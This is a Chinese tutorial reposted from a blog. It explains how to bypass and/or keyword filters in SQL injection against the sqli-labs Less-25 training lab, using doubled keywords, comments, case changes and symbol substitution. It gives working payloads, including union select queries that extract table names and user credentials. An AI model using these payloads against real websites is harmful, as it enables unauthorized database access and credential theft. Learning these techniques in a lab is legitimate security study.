ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

SQL注入 绕过and和or过滤

2021-12-09 14:02:33  阅读:417  来源: 互联网

标签:preg replace 过滤 大小写 SQL 字符串 绕过 id select


SQL注入 绕过and和or过滤

1.基础知识介绍

1.MySQL中的大小写不敏感,大写与小写一样。
2.MySQL中的十六进制与URL编码
3.符号和关键字替换and – &&、or–||
4.内联注释与多行注释

/*! 内联注释*/
/*多行注释*/

2.去除and和or的代码分析

preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组。
$subject:要搜索替换的目标字符串或字符串数组

在这里插入图片描述

$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);

值得一说的是preg_replace函数后面的/i是指ignore,就是忽略大小写

3.绕过去除and和or的SQL注入

1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除
2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
3.利用符号替代——and --&& or–||
我们以sqli-labs-less25为例
1.当我们输入1时,回显正常,当我们输入1\时报错

在这里插入图片描述
2.可以判断出,此sql注入为字符型,判断and,or等关键字是否被过滤

?id=1' and 1=1#

在这里插入图片描述
3.发现andor被过滤为空,这里我使用的是双写绕过

?id=1' oorr 1=1--+

在这里插入图片描述
4.爆破数据库
在这里插入图片描述
5.爆破数据表

?id=-1'and union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3%23

在这里插入图片描述

6.爆破字段名
在这里插入图片描述
7.爆破字段内容
获取用户名和密码

?id=-1' union select 1,(select group_concat(username,passwoorrd) from users),3--+

在这里插入图片描述

标签:preg,replace,过滤,大小写,SQL,字符串,绕过,id,select
来源: https://blog.csdn.net/m_de_g/article/details/121792949

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有